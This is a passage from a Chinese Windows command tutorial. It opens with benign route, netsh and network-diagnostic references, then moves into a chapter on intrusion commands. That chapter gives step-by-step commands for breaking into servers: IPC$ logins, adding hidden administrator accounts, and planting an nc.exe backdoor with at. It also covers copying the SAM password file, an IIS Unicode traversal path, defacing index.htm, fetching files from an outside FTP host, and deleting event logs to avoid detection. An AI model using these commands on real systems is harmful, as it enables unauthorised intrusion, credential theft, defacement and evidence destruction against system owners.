的路由,请键入: route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 if 0x3 要删除目标为 10.41.0.0,子网掩码为 255.255.0.0 的路由,请键入: route delete 10.41.0.0 mask 255.255.0.0 要删除 IP 路由表中以 10.开始的所有路由,请键入: route delete 10.* 要将目标为 10.41.0.0,子网掩码为 255.255.0.0 的路由的下一个跃点地址由 10.27.0.1 更改为 10.27.0.25,请键入: route change 10.41.0.0 mask 255.255.0.0 10.27.0.25 怎样在windowsserver的cmd下更改ip地址■■■ -> Windows 2k/2003 Server 在命令行下更改ip地址 Windows2000是现在比较流行的操作系统,它的功能是很强大的,它甚至可以象Unix一样在命令行下做很多的工作。下面一种在命令行下更改ip地址的方法,现介绍给大家(括号里是一些注释,黑体字是人工录入的): C:\>ipconfig (首先用ipconfig这个命令看一下更改之前的ip地址) Windows 2000 IP Configuration Ethernet adapter 本地连接: Connection-specific DNS Suffix .: IP Address............: 10.1.1.94 (本地连接更改之前的ip) Subnet Mask ...........: 255.255.255.0 Default Gateway .........: 10.1.1.254 C:\>netsh (进入设置模式) netsh>interface interface>ip interface ip>set address "本地连接" static 10.1.1.111 255.255.255.0 10.1.1.254 interface ip>exit 上文中的set命令具体解释如下: set address - 设置指定的接口的 IP 地址和默认网关。 set dns - 设置 DNS 服务器模式和地址。 set wins - 设置 WINS 服务器模式和地址。 网络常用命令: IPCONFIG C:\>ipconfig (更改后再用ipconfig命令看一下,确认一下是否更改成功) Windows 2000 IP Configuration Ethernet adapter 本地连接: Connection-specific DNS Suffix . IP Address............: 10.1.1.111 Subnet Mask ...........: 255.255.255.0 Default Gateway .........: 10.1.1.254 命令一览 ..- 移到上一层上下文级。 ? - 显示命令列表。 aaaa - 更改到 `aaaa' 上下文。 abort - 丢弃在脱机模式下所做的更改。 add - 将一个配置项添加到项目列表中。 alias - 添加一个别名 bye - 退出程序。 commit - 提交在脱机模式中所做的更改。 delete - 在项目列表上删除一个配置项目。 dhcp - 更改到 `dhcp' 上下文。 dump - 显示一个配置脚本。 exec - 运行一个脚本文件。 exit - 退出程序。 help - 显示命令列表。 interface - 更改到 `interface' 上下文。 offline - 将当前模式设置成脱机。 online - 将当前模式设置成联机。 popd - 从堆栈上打开一个上下文。 pushd - 将当前上下文放推入堆栈。 quit - 退出程序。 ras - 更改到 `ras' 上下文。 routing - 更改到 `routing' 上下文。 set - 更新配置设置。 show - 显示信息 unalias - 删除一个别名。 wins - 更改到 `wins' 上下文。 快速切换IP地址有绝招 在工作过程中会遇到在不同的网段中进行网络调试的情况,经常需要将机器在几个不同的IP地址中进行切换。在Win2000操作系统中改变IP地址较之Win98已经方便多了因为改完IP地址后不需要重启计算机 ,但还要进入网络属性设置中进行操作。有没有再简便一点的方法呢,比如用鼠标双击一下快捷方式就可以实现IP地址的切换? 答案是肯定的。在Win2000中用netsh命令就可以实现这个功能。首先进入命令行模式(在"开始→运行"中键入"cmd"即可进入命令行模式),在提示符下键入netsh即可进入netsh的界面。再键入int ip进入接口IP的配置模式,键入dump则列出接口IP配置信息: C:\Documents and Settings\Administrator>netsh netsh> netsh>int ip interface ip>dump # ---------------------------------- # 接口 IP 配置 # ---------------------------------- pushd interface ip # ″本地连接″ 的接口IP 配置(注:以下显示视具体机器情况而定) set address name = ″本地连接″ source = static addr = 192.168.0.5 mask = 255.255.255.0 set address name = ″本地连接″ gateway = 192.168.0.2 gwmetric = 1 set dns name = ″本地连接″ source = static addr = 61.237.17.181 add dns name = ″本地连接″ addr = 211.97.168.129 add dns name = ″本地连接″ addr = 211.98.4.1 set wins name = ″本地连接″ source = static addr = none # ″本地连接 2″ 的接口 IP 配置 set address name = ″本地连接 2″ source = dhcp set dns name = ″本地连接 2″ source = dhcp set wins name = ″本地连接 2″ source = dhcp popd # 接口 IP 配置结束 快速切换IP地址有绝招 2 现在我们可以大致了解到用netsh命令更改IP地址的方式,即通过"set address name =连接名称(连接名称要用引号括起来)source=static addr=IP地址 mask=子网掩码"来实现。 到命令行模式下用netsh直接试一下。比如要将本机的IP地址改为192.168.0.7,子网掩码为255.255.255.0,可以进行以下操作: C:\Documents and Settings\Administrator>netsh netsh>int ip interface ip>set address name ="本地连接"source = static addr = 192.168.0.7 mask = 255.255.255.0 确认更改。 interface ip>exit 再用ipconfig命令核实一下: C:\Documents and Settings\Administrator>ipconfig Windows 2000 IP Configuration Ethernet adapter 本地连接 2 Media State ........... Cable Disconnected Ethernet adapter 本地连接 Connection-specific DNS Suffix . IP Address............ 192.168.0.7 Subnet Mask ........... 255.255.255.0 Default Gateway ......... 192.168.0.2 从以上显示中可以看到已经成功实现了在Win2000中用命令行方式来改变IP地址。用这种方式改变IP地址甚至还没有在图形界面中操作来得快。不过我们再用脚本帮一下忙,离胜利目标就不远了。首先打开记事本,输入以下内容:  int ip set address name=″本地连接″ source=static addr=192.168.0.7 mask=255.255.255.0 然后保存为一个名为"7.sh"的文件,放到C盘根目录下,再进入命令行模式,在C盘根目录下键入"netsh exec 7.sh",好像没什么反应啊?不过再用ipconfig查看一下,会发现IP地址已经改过来了。 最后再用记事本写一个批处理文件,命名为"7.bat",内容为"netsh exec 7.sh"。为该文件在桌面上创建一个快捷方式,这样双击该快捷方式即可实现IP地址的快速改变。如果要快速在192.168.0.5、192.168.0.7等相同网段IP地址间进行切换的话,只需要改变"addr"后面的地址即可,但是要将IP地址改为如172.19.96.7之类不同网段的IP地址,就需要将网关信息一起改变,也就是在脚本文件中加入一行关于网关的信息: int ip set address name = ″本地连接″source = static addr= 172.19.96.7 mask = 255.255.255.0 set address name = ″本地连接″gateway = 172.19.96.1 gwmetric = 1 同样地将以上内容存为脚本文件,再做成批处理文件执行一下,用ipconfig/all命令检测一下,发现包括网关在内的信息也修改过来了。这是不是既快又方便,IP地址想换就换? 使用 netstat 显示连接统计 可以使用 netstat 命令显示协议统计信息和当前的 TCP/IP 连接。netstat -a 命令将显示所有连接,而 netstat -r 显示路由表和活动连接。netstat -e 命令将显示 Ethernet 统计信息,而 netstat -s 显示每个协议的统计信息。如果使用 netstat -n,则不能将地址和端口号转换成名称。 Tracert(跟踪路由)是路由跟踪实用程序,用于确定 IP 数据报访问目标所采取的路径。Tracert 命令用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到网络上其他主机的路由。 -d 指定不将IP 地址解析到主机名称。 -h maximum_hops 指定跃点数以跟踪到称为 target_name 的主机的路由。 -j host-list 指定 Tracert 实用程序数据包所采用路径中的路由器接口列表。 -w timeout 等待 timeout 为每次回复所指定的毫秒数。 target_name 目标主机的名称或 IP 地址。 pathping 命令是一个路由跟踪工具,它将 ping 和 tracert 命令的功能和这两个工具所不提供的其他信息结合起来。pathping 命令在一段时间内将数据包发送到到达最终目标的路径上的每个路由器,然后基于数据包的计算机结果从每个跃点返回。由于命令显示数据包在任何给定路由器或链接上丢失的程度,因此可以很容易地确定可能导致网络问题的路由器或链接。 -n Hostnames 不将地址解析成主机名。 -h Maximum hops 搜索目标的最大跃点数。 -g Host-list 沿着路由列表释放源路由。 -p Period 在 ping 之间等待的毫秒数。 -q Num_queries 每个跃点的查询数。 -w Time-out 为每次回复所等待的毫秒数。 -T Layer 2 tag 将第 2 层优先级标记(例如,对于 IEEE 802.1p)连接到数据包并将它发送到路径中的每个网络设备。这有助于标识没有正确配置第 2 层优先级的网络设备。-T 开关用于测试服务质量 (QoS) 连通性。 -R RSVP test Che 检查以确定路径中的每个路由器是否支持"资源保留协议 (RSVP)",此协议允许主机为数据流保留一定量的带宽。-R 开关用于测试服务质量 (QoS) 连通性。 在命令提示符下交互使用 DHCP 命令 打开 命令提示符。 键入 netsh。 在 netsh>(Netshell) 命令提示行键入"dhcp"。 在 dhcp>(DHCP 辅助程序)命令提示行,为您要管理的服务器键入 server \\servername 或 server ip_address。 一旦您有权管理的服务器已成功连接,则会看到"您可以对服务器 servername 进行读写访问" 一旦连接成功,您就可以使用用于 DHCP 的任何支持的 Netshell 命令。键入 /? 或 help 来显示直接的 DHCP 子命令菜单或作为选项显示,键入 list 列出可与 DHCP 一起使用的所有 Netshell 子命令。 route 的命令 routing ip add/delete/set/show interface 在指定接口上添加、删除、配置或显示常规 IP 路由设置。 routing ip add/delete/set/show filter 在指定接口上添加、删除、配置或显示 IP 数据包筛选器。 routing ip add/delete/show boundary 在指定接口上添加、删除或显示多播边界设置。 routing ip add/set ipiptunnel 添加或配置 IP 中的 IP 接口。 routing ip add/delete/set/show rtmroute 添加、配置或显示不持续的路由表管理器路由。 routing ip add/delete/set/show persistentroute 添加、删除、配置或显示持续路由。 routing ip add/delete/set/show preferenceforprotocol 添加、删除、配置或显示路由协议的优先级。 routing ip add/delete/set/show scope 添加、删除或显示多播作用域。 routing ip set/show loglevel 配置或显示全局 IP 记录等级。 routing ip show helper 显示 IP 的所有 Netsh 实用程序子环境。 routing ip show protocol 显示所有正在运行的 IP 路由协议。 routing ip show mfe 显示多播转发项。 routing ip show mfestats 显示多播转发项统计。 routing ip show boundarystats 显示 IP 多播边界。 routing ip show r*estinations 显示路由表管理器路由表中的目标。 routing ip show rtmroutes 显示路由表管理器路由表中的路由。 routing ip nat set/show global 配置或显示全局网络地址转换 (NAT) 设置。 routing ip nat add/delete/set/show interface 添加、删除、配置或显示指定接口的 NAT 设置。 routing ip nat add/delete addressrange 在 NAT 接口公用地址池中添加或删除一个地址范围。 routing ip nat add/delete addressmapping 添加或删除 NAT 地址映射。 routing ip nat add/delete portmapping 添加或删除 NAT 端口映射。 routing ip autodhcp set/show global 配置或显示全局 DHCP 分配器参数。 routing ip autodhcp set/show interface 配置或显示指定接口的 DHCP 分配器设置。 routing ip autodhcp add/delete exclusion 在 DHCP 分配器地址范围中添加或删除一个排除范围。 routing ip dnsproxy set/show global 配置或显示全局 DNS 代理参数。 routing ip dnsproxy set/show interface 配置或显示指定接口的 DNS 代理参数。 routing ip igmp set/show global 配置或显示 IGMP 全局设置。 routing ip igmp add/delete/set/show interface 在指定接口上添加、删除、配置或显示 IGMP。 routing ip igmp add/delete staticgroup 添加或删除指定接口的静态多播组。 routing ip igmp show grouptable 显示 IGMP 主机组表。 routing ip igmp show ifstats 显示每个接口的 IGMP 统计。 routing ip igmp show iftable 显示每个接口的 IGMP 主机组。 routing ip igmp show proxygrouptable 显示 IGMP 代理接口的 IGMP 组表。 routing ip igmp show rasgrouptable 显示远程访问服务器所使用的 Internet 接口的组表。 routing ip ospf set/show global 配置或显示全局 OSPF 设置。 routing ip ospf add/delete/set/show interface 在指定接口上添加、删除、配置或显示 OSPF。 routing ip ospf add/delete/set/show area 添加、删除、配置或显示 OSPF 区域。 routing ip ospf add/delete/show range 在指定的 OSPF 区域上添加、删除、配置或显示范围。 routing ip ospf add/delete/set/show virtif 添加、删除、配置或显示 OSPF 虚拟接口。 routing ip ospf add/delete/show neighbor 添加、删除、配置或显示 OSPF 邻居。 routing ip ospf add/delete/show protofilter 添加、删除、配置或显示 OSPF 外部路由的路由信息源。 routing ip ospf add/delete/show routefilter 添加、删除、配置或显示 OSPF 外部路由的路由筛选。 routing ip ospf show areastats 显示 OSPF 区域统计。 routing ip ospf show lsdb 显示 OSPF 链接状态数据库。 routing ip ospf show virtifstats 显示 OSPF 虚拟链接统计。 routing ip relay set global 配置"DHCP 中继代理程序"的全局设置。 routing ip relay add/delete/set interface 在指定接口上添加、删除或配置"DHCP 中继代理程序"设置。 routing ip relay add/delete dhcpserver 在 DHCP 服务器地址列表中添加或删除 DHCP 服务器的 IP 地址。 routing ip relay show ifbinding 显示接口的 IP 地址绑定。 routing ip relay show ifconfig 显示每个接口的"DHCP 中继代理程序"配置。 routing ip relay show ifstats 显示每个接口的 DHCP 统计。 routing ip rip set/show global 配置 IP 的 RIP 全局设置。 routing ip rip add/delete/set/show interface 在指定接口上添加或配置 IP 的 RIP 设置。 routing ip rip add/delete peerfilter 添加或删除 RIP 对等筛选器。 routing ip rip add/delete acceptfilter 在接受的路由列表中添加或删除 RIP 路由筛选器。 routing ip rip add/delete announcefilter 在公布的路由列表中添加或删除 RIP 路由筛选器。 routing ip rip add/delete/show neighbor 添加或删除 RIP 邻居。 routing ip rip set/show flags 在指定接口上配置 IP RIP 高级设置。 routing ip rip show globalstats 显示全局 RIP 参数。 routing ip rip show ifbinding 显示接口的 IP 地址绑定。 routing ip rip show ifstats 显示每个接口的 RIP 统计。 IPX netsh 路由命令 routing ipx add/set staticroute 在 IPX 路由表中添加或配置静态 IPX 路由。 routing ipx add/set staticservice 在 SAP 服务表中添加或配置静态 SAP 服务。 routing ipx add/set filter 在指定的接口上添加或配置 IPX 数据包筛选器。 routing ipx add/set interface 在请求拨号接口上启用 IPX 路由,或在指定的接口上配置 IPX 设置。 routing ipx set global 配置全局 IPX 路由设置。 routing ipx rip add/set filter 添加和配置 RIP 路由筛选器。 routing ipx rip set global 配置全局 IPX 的 RIP 设置。 routing ipx rip set interface 在指定接口上配置 IPX 的 RIP 设置。 routing ipx sap add/set filter 添加或配置 SAP 服务筛选器。 routing ipx sap set global 配置全局 IPX 的 SAP 设置。 routing ipx sap set interface 在指定接口上配置 IPX 的 SAP 设置。 routing ipx netbios add nbname 将静态 NETBIOS 名称添加到 IPX NetBIOS 名称表中。 routing ipx netbios set interface 在指定接口上配置基于 IPX 的 NetBIOS 设置。 WINS NetSh 命令 list 列出所有可用的 WINS 命令。 dump 将 WINS 服务器配置转储到命令输出。 add name 在服务器上注册名称。详细信息,请输入 add name /? add partner 向服务器添加复制伙伴。详细信息,请输入 add partner /? add pngserver 添加当前服务器的 Persona Non Grata 服务器列表。详细信息,请输入 add pngserver /? check database 检查数据库的一致性。详细信息,请输入 check database /? check name 检查一组 WINS 服务器的名称记录列表。详细信息,请输入 check name /? check version 检查版本号的一致性。详细信息,请输入 check version /? delete name 从服务器数据库中删除已注册的名称。详细信息,请输入 delete name /? delete partner 从复制伙伴列表中删除复制伙伴。详细信息,请输入 delete partner /? delete records 从服务器删除或逻辑删除所有记录或一组记录。详细信息,请输入 delete records /? delete owners 删除所有者列表及其记录。详细信息,请输入 delete owners /? delete pngserver 从列表中删除所有的或选定的 Persona Non Grata 服务器。详细信息,请输入 delete pngserver /? init backup 备份 WINS 数据库。详细信息,请输入 init backup /? init import 从 Lmhosts 文件导入数据。详细信息,请输入 init import /? init pull 启动"拉"触发器,并发送给另一台 WINS 服务器。详细信息,请输入 init pull /? init pullrange 开始另一台 WINS 服务器的一组记录,并读取该记录。详细信息,请输入 init pullrange /? init push 启动"推"触发器,并发送给另一台 WINS 服务器。详细信息,请输入 init push /? init replicate 用复制伙伴复制数据库。详细信息,请输入 init replicate /? init restore 从文件还原数据库。详细信息,请输入 init restore /? init scavenge 清除服务器的 WINS 数据库。详细信息,请输入 init scavenge /? init search 搜索服务器的 WINS 数据库。详细信息,请输入 init search /? reset statistics 重置服务器的统计信息。详细信息,请输入 reset statistics /? set autopartnerconfig 设置服务器的自动复制伙伴配置信息。详细信息,请输入 set autopartnerconfig /? set backuppath 设置服务器的备份参数。详细信息,请输入 set backuppath /? set burstparam 设置服务器的突发处理参数。详细信息,请输入 set autopartnerconfig /? set logparam 设置数据库和事件日志记录选项。详细信息,请输入 set logparam /? set migrateflag 设置服务器的迁移标志。详细信息,请输入 set migrateflag /? set namerecord 设置服务器的间隔和超时值。详细信息,请输入 set namerecord /? set periodicdbchecking 设置服务器的定期数据库检查参数。详细信息,请输入 set periodicdbchecking /? set pullpartnerconfig 设置指定的"拉"伙伴的配置参数。详细信息,请输入 set pullpartnerconfig /? set pushpartnerconfig 设置指定的"推"伙伴的配置参数。详细信息,请输入 set pushpartnerconfig /? set pullparam 设置服务器的默认"拉"参数。详细信息,请输入 set pullparam /? set pushparam 设置服务器的默认"推"参数。详细信息,请输入 set pushparam /? set replicateflag 设置服务器的复制标志。详细信息,请输入 set replicateflag /? set startversion 设置数据库的开始版本 ID。详细信息,请输入 set startversion /? show browser 显示所有活动域主浏览器的 [1Bh] 记录。详细信息,请输入 show browser /? show database 显示指定服务器的数据库和记录。详细信息,请输入 show database /? show info 显示配置信息。详细信息,请输入 show info /? show name 显示服务器中特定记录的详细信息。详细信息,请输入 show name /? show partner 显示服务器的"拉"或"推"(或"推拉")伙伴。详细信息,请输入 show partner /? show partnerproperties 显示默认伙伴配置。详细信息,请输入 show partnerproperties /? show pullpartnerconfig 显示"拉"伙伴的配置信息。详细信息,请输入 show pullpartnerconfig /? show pushpartnerconfig 显示"推"伙伴的配置信息。详细信息,请输入 show pushpartnerconfig /? show reccount 显示指定服务器所拥有的记录数量。详细信息,请输入 show reccount /? show recbyversion 显示指定服务器所拥有的记录。详细信息,请输入 show recbyversion /? show server 显示当前选定的服务器。详细信息,请输入 show server /? show statistics 显示 WINS 服务器的统计信息。详细信息,请输入 show statistics /? show version 显示 WINS 服务器的当前版本计数器值。详细信息,请输入 show version /? show versionmap 显示所有者 ID 到"最大版本数"的映射。详细信息,请输入 show versionmap /? Interface 命令 interface set/show interface 启用、禁用、连接、断开连接以及显示请求拨号接口的配置。 interface set/show credentials 在请求拨号接口上配置或显示用户名、密码和域名 第5章 入侵命令详解 1:NET 只要你拥有某IP的用户名和密码,那就用IPC$做连接吧! 这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1 net use \\127.0.0.1\ipc$ 123456 /user:hbx null密码为空 退出的命令是 net use \\127.0.0.1\ipc$ /delete net share是查看主机共享资源我们用它建一个秘密共享目录吧net share me=c:\winnt\system32 这样这个机器就有了一个名为me的共享目录,而打开它就是winnt下的system32目录,如果你用win2000的系统就知这个目录有多重要了,如果不想要也好办net share me /delete 呵呵,没有了,是不是很方便的啊。 下面的操作你必须登陆后才可以用.登陆的方法就在上面. 下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户. 我们加一个heibai的用户密码为lovechina net user heibai lovechina /add 只要显示命令成功,那么我们可以把他加入Administrator组了. net localgroup Administrators heibai /add 这里是讲映\*对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映\*到本地的Z盘. net use z:\\127.0.0.1\c$ net start telnet 这样可以打开对方的TELNET服务. 这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。 net user guest /active:yes(特别注意:这个命令是把原来被禁用的guest帐户再次激活) net user guest /active:no这样这个guest的用户就又被禁用了 这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀! net user guest lovechina 有人问到提高权限的问题 下面就解决下 net localgroup administrators guest /add 将guest变为administrator net命令果然强大啊! net view命令看对方开了共享 net user是查看所有用户列表,看看哪个用户是和你一样偷跑进来的,给他名给删掉,让他美, net user 用户名 /delete哈哈,他没有了,管他什么是不是管理员呢,不过我们还是查一下管理员组有什么用户吧,这样的用户才对我们有用嘛 net localgroup administrators就列出管理员组成员了,再查看一下administrator这个用户,因为这个是创建系统时建出来的,所以要看看他的系统是什么时间创建出来的 net user administrator,然后再查看别的管理员用户是什么时间创建的,如果相差太远,那可能是被别人偷偷跑来偷建的,一律del,安全第一哦................ 2:at 一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢? 那么需要用AT命令,这里假设你已经登陆了那个服务器。 你首先要得到对方的时间, net time \\127.0.0.1 将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1 at \\127.0.0.1 12:3 nc.exe 这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上. 这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99. 等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马. at命令功能强大,下面可以打个比方: C:\> AT 22:30 Start C:\prettyboy.mp3 新加了一项作业,其作业 ID = 1 [现在我们新建立了一个任务 在22:30分 系统将自动播放歌曲] 3:telnet 这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口. telnet 127.0.0.1 99 这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡. 4:FTP 它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个WWW.51.NET,不错的.当我们申请完后,它会给用户名,密码,以及FTP服务器. 在上传前需要登陆先,这里我们假设FTP服务器是WWW.51.NET,用户名是HUCJS,密码是654321 ftpwww.51.net 他会要求输入用户,成功后会要求输入密码. ---------------------- 下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\ get c:\index.htm d:\ 假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下 put c:\index.htm d:\ 5:copy 下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。 这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下 copy index.htm \\127.0.0.1\c$\index.htm 如果你要复制到D盘下把C改为D,就行了! copy index.htm \\127.0.0.1\d$\index.htm 如果你要把他复制到WINNT目录里 就要把输入 copy index.htm \\127.0.0.1\admin$\index.htm admin$是winnt 要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名 下面就把127.0.0.1的数据库复制到本地C盘下 copy \\127.0.0.1\admin$\repair\sam._ c:\ 6:set 如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令! 下面是我得到的结果!我来分析它,只是找主页在那而已。 COMPUTERNAME=PENTIUMII ComSpec=D:\WINNT\system32\cmd.exe CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=*/* HTTP_ACCEPT_LANGUAGE=zh-cn HTTP_CONNECTION=Keep-Alive HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了 HTTP_ACCEPT_ENCODING=gzip,deflate HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) NUMBER_OF_PROCESSORS=1 Os2LibPath=D:\WINNT\system32\os2\dll; OS=Windows_NT Path=D:\WINNT\system32;D:\WINNT PATHEXT=.COM;.EXE;.BAT;.CMD PATH_TRANSLATED=E:\vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3,GenuineIntel PROCESSOR_LEVEL=6 PROCESSOR_REVISION=0303 PROMPT=$P$G QUERY_STRING=/c+set REMOTE_ADDR=XX.XX.XX.XX REMOTE_HOST=XX.XX.XX.XX REQUEST_METHOD=GET SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe SERVER_NAME=XX.XX.XX.XX SERVER_PORT=80 SERVER_PORT_SECURE=0 SERVER_PROTOCOL=HTTP/1.1 SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0 SystemDrive=D: SystemRoot=D:\WINNT TZ=GMT-9 USERPROFILE=D:\WINNT\Profiles\Default User windir=D:\WINNT 粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。 7:nbtstat 如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧! 现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。 命令是 nbtstat -A XX.XX.XX.XX -A一定要大写哦。 这个我认为大不大写没有太大差别,用处还是一样的。 之后用net use \\对方IP 连接一下! net view \\对方IP 查看对方共享文件夹 net use X: \\IP\对方共享文件 映\*对方共享文件夹成为本机的X盘 这就是139端口的基本用法!不过前提是必须对方开共享! netstat -n看看谁连接你 ----------------- 下面是得到的结果。 NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- Registered Registered Registered Registered Registered Registered Registered Reg istered Registered Registered Registered MAC Address = 00-E0-29-14-35-BA PENTIUMII <00> UNIQUE PENTIUMII <20> UNIQUE ORAHOTOWN <00> GROUP ORAHOTOWN <1C> GROUP ORAHOTOWN <1B> UNIQUE PENTIUMII <03> UNIQUE INet~Services <1C> GROUP IS~PENTIUMII...<00> UNIQUE ORAHOTOWN <1E> GROUP ORAHOTOWN <1D> UNIQUE ..__MSBROWSE__.<01> GROUP 粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是 <03> 的话,那他前面的就是用户. 这里的用户是PENTIUMII。 没有03说明:MAC没和IP捆在一起了 8:Shutdown 关了对方的NT服务器的命令 Shutdown \\IP地址 t:20 20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。 Telnet进去用命令或者是本地用什么软件重启对方电脑 shutdown -m \\计算机名称 可以远程重起或关闭的 9:DIR 这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。 你可以本地试下。 10:echo 著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。 我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”写入index.htm,有2种方法,大家看看有什么区别。 echo 南京大屠杀铁证如山,任何日本人不得抵赖!>index.htm echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>index.htm 第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖!”写进index.htm。 第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”加到index.htm里面。 “>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。 大家可以本地试下。 可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。 1、首先,我们需要申请一个免费的主页空间。 2、用echo在可写目录下建立如下内容的txt文件 以chinren服务器为例。) open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的) cnhack(你申请时的用户名) test(你申请时的密码) get index.htm c:\inetpub\wwwroot\index.htm(这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm) bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS) 具体的做法: 输入 echo open upload.chinaren.com> c:\cnhack.txt 输入 echo cnhack >> c:\cnhack.txt 输入 echo 39abs >> c:\cnhack.txt 输入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt 最后输入 ftp -s:c:\cnhack.txt (利用ftp的-s参数,执行文件里的内容。) 等命令完成时,文件已经下载到你指定的文件里了。 注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。) 记得要 del c:\cnhack.txt 11:attrib 这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。 attrib -r index.htm 这个命令是把index.htm的只读属性去掉。 如果把“-”改为“+”则是把这个文件的属性设置为只读 ---------------------- attrib +r index.htm 这个命令是把index.htm的属性设置为只读。 12:del 当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦!想被捉吗。呵呵。 NT的日志有这些 del C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log 只要删除这些就可以了。有些系统NT安装在D盘或其他盘,就要把C改成其他盘。 第6章 1,怎样建立空连接,它有什么用? 答:使用命令 net use \IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。 对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。 2.为什么我连不上IPC$? 答:1.只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。 2.确认你的命令没有打错。正确的命令是:net use \目标IPipc$ "密码" /user:"用户名" 注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。 3,根据返回的错误号分析原因: 错误号5,拒绝访问 :很可能你使用的用户不是管理员权限的,先提升权限; 错误号51,Windows 无法找到网络路径 : 网络有问题; 错误号53,找不到网络路径 :ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤); 错误号67,找不到网络名 :你的lanmanworkstation服务未启动;目标删除了ipc$; 错误号1219,提供的凭据与已存在的凭据集冲突 :你已经和对方建立了一个ipc$,请删除再连。 错误号1326,未知的用户名或错误密码 :原因很明显了; 错误号1792,试图登录,但是网络登录服务没有启动 :目标NetLogon服务未启动。(连接域控会出现此情况) 错误号2242,此用户的密码已经过期 :目标有帐号策略,强制定期要求更改密码。 4,关于ipc$连不上的问题比较复杂,没有总结出一个统一的认识,在肉鸡上实验有时会得出矛盾的结论,十分棘手。而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。 5,怎样打开目标的IPC$? 答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。 6,怎样映射和访问默认共享? 答:使用命令 net use z: \目标IPc$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。 如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe \IPd$pathmuma.exe 。或者再映射也可以,只是不用用户名和密码了:net use y: \IPd$ 。然后 copy 